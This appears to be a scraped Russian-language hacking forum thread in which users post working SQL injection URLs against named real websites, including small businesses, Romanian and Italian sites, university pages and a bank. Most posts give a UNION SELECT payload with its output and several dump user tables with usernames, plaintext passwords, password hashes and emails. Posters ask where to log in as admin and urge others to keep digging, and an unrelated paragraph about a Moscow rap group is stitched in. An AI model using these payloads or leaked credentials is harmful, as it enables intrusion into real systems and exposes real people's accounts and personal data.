Code: http://[COLOR=YellowGreen][host][/COLOR]/searchresult.php?sbcat_id=999999[sql-inj] Code: http://[COLOR=YellowGreen]www.mytarif.com[/COLOR]/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.1.22-standard:anime_yemek@localhost:anime_yemek Code: http://[COLOR=YellowGreen]www.garnek.net[/COLOR]/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.1.22-log:[email protected]:byq_9 Code: http://[COLOR=YellowGreen]www.kochfeuer.de[/COLOR]/searchresult.php?sbcat_id=9999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 5.0.32-Debian_7etch1~bpo.1-log:dbu1017245@localhost:db1017245-kochfeuer1 Code: http://[COLOR=YellowGreen]www.coolave.com[/COLOR]/resources/searchresult.php?sbcat_id=99999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/* 5.0.37-standard-log:avemusic_h742510@localhost:avemusic_coolave Code: http://[COLOR=YellowGreen]www.arabhorse.com[/COLOR]/links/searchresult.php?sbcat_id=1111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/* 4.1.22-standard:arabhors_ah@localhost:arabhors_arabhorsedb Code: http://[COLOR=YellowGreen]www.desikitchen.com[/COLOR]/new/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.1.22-standard:desikit_desikit2@localhost:desikit_portal2 Code: http://[COLOR=YellowGreen]www.bobsbeerandbbq.com[/COLOR]/searchresult.php?sbcat_id=11111111+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 5.0.27-standard-log:claudia_recipe@localhost:claudia_recipe Code: http://[COLOR=YellowGreen]www.dubina.com[/COLOR]/searchresult.php?pg=5&sbcat_id=9999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5/* 4.1.22-standard-log:dubinaco_dubdir@localhost:dubinaco_dir1 Code: http://[COLOR=YellowGreen]www.grizzlynut.co.nz[/COLOR]/directory/searchresult.php?&sbcat_id=99999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/* 4.1.22-standard-log:grizzlyn_direct@localhost:grizzlyn_direct
Code: http://www.realityhomes.com.do/cat.php?id=999+union+select+1,2,3,concat_ws(0x2F,user,pass,mail),5,6,7,8,9,10,11+from+usuarios/* Version: 5.0.27-standard/nachon_sistema@localhost/nachon_sistema Админы и юзвери User Pass Mail nachon/viejito/[email protected] guitarman/123456/[email protected] yospower/power/[email protected] tribi32/triby0/[email protected] F./5v5ml5g5v5/[email protected] teodoro/toly2468/[email protected] joriel/0230/[email protected] nmcprl/Carlanatalia/[email protected] herrerap/222008/[email protected] Carlos/crpf13/[email protected] mamto/8808607/[email protected] Jissel/filipe/[email protected] otto/77688166601/[email protected] dj-luis/987654321/[email protected] elisa/espimai/[email protected]
Группа Центр Дата рождения: 2004 год Место рождения: г. Москва Краткое досье: это одно из самых сильных звеньев СПРУТ групп, который является Единственным Союзом по-настоящему разносторонних уличных талантов. «Центр» является основой этого объединения, принимая непосредственное участие в концертной и творческой деятельности проекта. Группа «Центр» объединяет самых перспективных и интересных рэп-исполнителей на данный момент: Гуфа aka Rolex-X, Slim’а aka Slimus, Птаху и Принципа. И если первый – гений текстов и крылатых фраз, второй профессионал от музыки, то последние два – отлично читают, преподнося наработанный материал наилучшим образом. PHP: http://www.centrgroup.ru/nn.php?id=-1+union+select+1,2,3,4,5,concat(id,0x20,user_name,0x3a,user_pass),7+from+users+where+id=1/* и ещё чета PHP: http://www.gala-europe.de/ps.php?ID=-1'+union+select+table_name,2+from+information_schema.tables/*
rmx.ru http://www.rmx.ru/photo/?id=-1+or+1=@@version-- Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) http://www.rmx.ru/photo/?id=-1+or+1=(select+db_name())-- remix http://www.rmx.ru/photo/?id=-1+or+1=(select+system_user)-- REMIXUS\IUSR_REMIXUS ------------------------------------------------------------------------ e-rostov.ru http://www.e-rostov.ru/nws_podrob.php?nws=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9/* 5.0.27/db0662111/db0662111@localhost http://www.e-rostov.ru/nws_podrob.php?nws=-1+union+select+1,2,3,4,5,concat_ws(0x2F,cast(al_login+as+binary),cast(al_password+as+binary)),7,8,9+from+admin_list+limit+0,1/* логин/хеш artexoid/81dc9bdb52d04dc20036dbd8313ed055 Другие интересные таблицы: board_admin (LOGIN/ PASSWD), estate_admin(LOGIN/ PASSWD), estate_loginag(LOGIN / PASSWORD), news_admin(LOGIN/ PASSWD), question_admin(LOGIN/ PASSWD), stat_admin(LOGIN/ PASSWD), stic_admin(LOGIN/ PASSWD)
http://utdallas.edu/calendar/event.php?id=-1+UNION+SELECT+1,database(),version(),user(),5,6,7,8,9,10,11,12,13/* user() == [email protected] database() == calendar version() == 4.0.18-max-log
И вновь - Румыния! burseguvern.ro Code: http://www.burseguvern.ro/articole/articol.php?id=2&id_modul=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5/* 4.1.22-standard-log:burseguv_burse:burseguv_adm@localhost ugir1903.ro Code: http://www.ugir1903.ro/ugir1903/articol.php?codp=-1+union+select+concat_ws(0x3a,version(),database(),user())/* 4.1.22-standard-log:ugir1903_main:ugir1903_web@localhost dreptonline.ro Code: http://www.dreptonline.ro/articole/articol.php?id_articol=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9/* 4.1.22-standard:dreptonl_dr:dreptonl_dr@localhost В табе useri 12 692 юзера : Code: http://www.dreptonline.ro/articole/articol.php?id_articol=-1+union+select+concat_ws(0x3a,user,parola,email),2,3,4,5,6,7,8,9+from+useri+limit+12691,1/* Немного данных [user : pass : email] : Code: Dan:gringotts:[email protected] [COLOR=MediumTurquoise]Hfirimain:gringotts:[email protected][/COLOR] - типа Админ auras1:ferari11:[email protected] florian.r:dreptcivil:[email protected]
Румыния SmartCall.ro Code: http://www.smartcall.ro/document.php?doc=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9/* 5.0.18:smartcall:smartcall@localhost Наша таба auth_users: Code: id,username,email,password_md5,конецформыначалоформыis_superuser,first_name,last_name Данные: Code: http://www.smartcall.ro/document.php?doc=-1+union+select+1,2,concat_ws(0x3a,aes_decrypt(aes_encrypt(username,0x71),0x71),aes_decrypt(aes_encrypt(password_md5,0x71),0x71)),4,5,6,7,8,9+from+test.auth_users+limit+0,1/* Админ: Code: dima:ebb934cccce0cbe48e5b017398807a46 AMIcom.ro Code: http://www.amicom.ro/studii/studiu.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/* 5.0.27:amicom:amicomadmin@localhost Таба users: Code: username,userpass Админка стандартно - _http://www.amicom.ro/admin/ Админ: Code: admin : admin123
Румыния ReporterDeOcazie.ro Code: http://www.reporterdeocazie.ro/index.php?page=intrebarea_zilei&id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/* 5.0.21:reporterdeocazie:reporter@localhost Наши таблицы - Admin,Useri и phpbb_users Таблица Admin - пустая, с остальными проблем нет: Code: http://www.reporterdeocazie.ro/index.php?page=intrebarea_zilei&id=-1+union+select+1,concat_ws(0x3a,User,Password,Email),3,4,5+from+Useri+limit+0,1/*
Муниципальные образования Приморского края Code: http://www.mo.primorsky.ru/kirovsky/view.php?id=-1+union+select+1/* www.mxd.ru Code: http://www.mxd.ru/projects/design/view.php?id=-1+union+select+1,database(),3,4,user(),6,7,pass,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23+from+user/* Пароль админа: root правда логин не знаю , и куда все эт сувать [email protected] 4.0.27-log http://women.unesco.kz Code: http://women.unesco.kz/view.php?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5,6+from+users+limit+1/* XaHyMaH : aurora не нашел где залогиниться =( http://www.patkirk.com Code: http://www.patkirk.com/make.php?id=-1+union+select+user(),database(),version(),4,5,6,7+INFORMATION_SCHEMA/* web18-patkirk1@localhost web18-patkirk1 5.0.45-community дальше ни че не смог сделать. есил что то получится у вас, отпишитесь плз. Code: http://www.age.fr/fr/module.php?ID=-1+order+by+11/* После долгих мучений, я в плюсе!!!
http://portsmon.freebsd.org/ http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniOn+selEct+concat(version(),':',user()),2,3,4/*&wildcard=yes 5.0.45_:_portsmon_u@localhost http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniOn+selEct+concat(table_name,':',column_name),2,3,4+from+information_schema.columns/*&wildcard=yes таблиц много, но как и следовало ожидать /для меня/ не чего интересного
Италия Code: http://www.megalab.it/articoli.php?id=220&pagina=-2+union+select+concat_ws(char(58),user(),version(),database())/* megalabdb@localhost:5.0.37-log:megalab Code: http://www.aduc.it/dyn/comunicati/comu_mostra.php?id=999999999999999+union+select+1,2,concat_ws(char(58),user(),version(),database()),4/* aduc@localhost:5.0.26:aducdb Code: http://www.sodalitas.it/news.php?ID=-222+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/* sod78as68@localhost:4.1.20:Sql945as Code: http://www.corvorosso.it/pagine/articoli.php?id=-1021+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* [email protected]:5.0.24a-Debian_9ubuntu2-log:corvo Code: http://www.ghislieri.it/pagina.php?id=-104+union+select+1,2,3,4,5,6,7,8/* rettorato@localhost:5.0.27-log:rettorato
Италия Code: http://www.millenniumcampaign.it/standup/newsDett.php?id=-36+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5/* [email protected]:4.1.22-standard-log:millenniumcampaign_it_standup2007 edu Code: http://blogsforlearning.msu.[SIZE=4][B][COLOR=Red]edu[/COLOR][/B][/SIZE]/articles/view.php?id=-6+union+select+1,2,3,4,5,6,7,8,9/*
ОАО «Белвнешэкономбанк» Code: http://www.bveb.by/news/index.php?ItemNumber=-1+union+select+1,2,3,4,5,6,7,8,9,1,2/* Кому интересно, копайте дальше...
нифига не получается! пробую просто на локальном компе, вообще для другой базы. На простейшем примере. Вот так пишет в файл: Code: SELECT description FROM films WHERE fid =5 into outfile '123654.txt' а вот так выдает ошипку: Code: SELECT description FROM films WHERE fid =5 into outfile char(49,50,51,54,53,52,46,116,120,116) и так тоже не пашет: (типа имя файла в кавычки взял: Code: SELECT description FROM films WHERE fid =5 into outfile char(39,49,50,51,54,53,52,46,116,120,116,39) Выходит, что нельзя писать в файл если кавычечги фильтруются?
код: http://inbox.net.ua/index.php?id=900&show=news&newsid=-3462+union+select+1,table_name,3+from+information_schema.tables+limit+992,1/* большая бд,стоит фильтрация на скобки __________________________________________ достаточно большой сайт код: http://www.femina.com.ua/cgi-bin/board.cgi?page=694&zrazdel=-3+union+select+1,concat(username,0x3a,user_password)+from+phpbb_users+limit+1,1/*&pages=1046 5 версия мускула,много таблиц админ на форуме admin:atvbyf __________________________________________ тоже не маленький сайт код: http://wantbaby.info/guide/glossary/?Term=-5+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9+from+information_schema.columns/* вывод-"все сразу"
www.strawtec.com.au Code: http://www.strawtec.com.au/content.php?id=<sql-inj> 4.1.12a-nt-max:strawtec@localhost:strawbale Code: strawtecadmin:snowfall88 strawtec:Phil Egan brett:trustno1
Официальный сайт хоккейного клуба «Рязань» Code: http://hcryazan.ru/about_user.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,mail,icq),3,mail,icq,pass,6,7,8,9+from+users/* Эт база всех юзеров - ник пароль мыло ася Admin : secret : [email protected] : 399828412 помогите найти, куда пароль вводить для админа. З.Ы: если кто за них болеет, не обижайтесь Code: http://www.shadowknights.ru/index.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13/*
